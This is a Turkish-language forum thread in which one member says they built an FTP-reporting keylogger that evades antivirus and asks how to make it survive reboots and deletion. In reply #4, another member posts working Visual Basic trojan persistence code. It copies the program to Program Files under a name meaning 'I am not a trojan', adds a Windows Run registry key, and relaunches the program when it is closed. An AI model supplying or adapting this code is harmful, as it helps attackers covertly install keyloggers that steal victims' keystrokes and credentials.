![]() |
| |||||||
| Visual Basic Visual Basic Hakkında Herşey |
| ||
![]() |
| | LinkBack | Seçenekler | Stil |
| | #1 (permalink) |
Member | [B]ArkadaşLar ben şimdi Loqer yapdm Inet ile Ftp Gönderimide qercekleşiyor ve antilere yakalanmadını anladım Herneyse konuma qeLeyim şimdi Bana Bilgisayar Her acıldıgında keylogerin calşması için gerekli kod lazım ( karşıya atılan Exe silinse ßile caLışsın ) ßirde Timer'n Saniyesini (interval) 60000 yani 60 saniye bunu 10dk yapmamız mümkünmü keyloger sorunsuz calışırsa forumda kaynak kodlarını yayınlıycam Şimdiden teşekkür ederim Yardmcı olmak isteyen : Msn wermek yasakmış NaTre öLe dior ![]() Konu exkalibur tarafından (12-24-09 Saat 23:50 ) değiştirilmiştir.. |
|
| | #4 (permalink) |
Undetecter Lab's | Private Sub Form_Initialize() ' Trojan her çalıştığında Program Files klasörlerine kendisini kopyalayacak. On Error Resume Next Dim yol, ad, TamYol yol = App.Path ad = App.EXEName & ".exe" TamYol = yol & "\" & ad ' Kopyalar ![]() FileCopy TamYol, "C:\Program Files\BenTrojanDeğilim.exe" End Sub Private Sub Form_Load() 'Trojan her başladığında kendisini windows Kayıt defterine windows ile 'birlikte başlamak üzere kayıt ediyor... Dim KayitDefteri As Object Set KayitDefteri = CreateObject("wscript.shell") KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe" End Sub Private Sub Form_Terminate() ' Program kapatılsa bile tekrar çalışacak. Dim ac, d1 As String d1 = "C:\Program Files\BenTrojanDeğilim.exe" ac = Shell(d1) End Sub
__________________ ƃɹo˙ǝʇınsoʇdʎɹɔ˙ʍʍʍ |
|
| | #5 (permalink) | |
Member | Alıntı:
![]() | |
|
![]() |
| Bookmarks |
| Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir) | |
| Seçenekler | |
| Stil | |
| |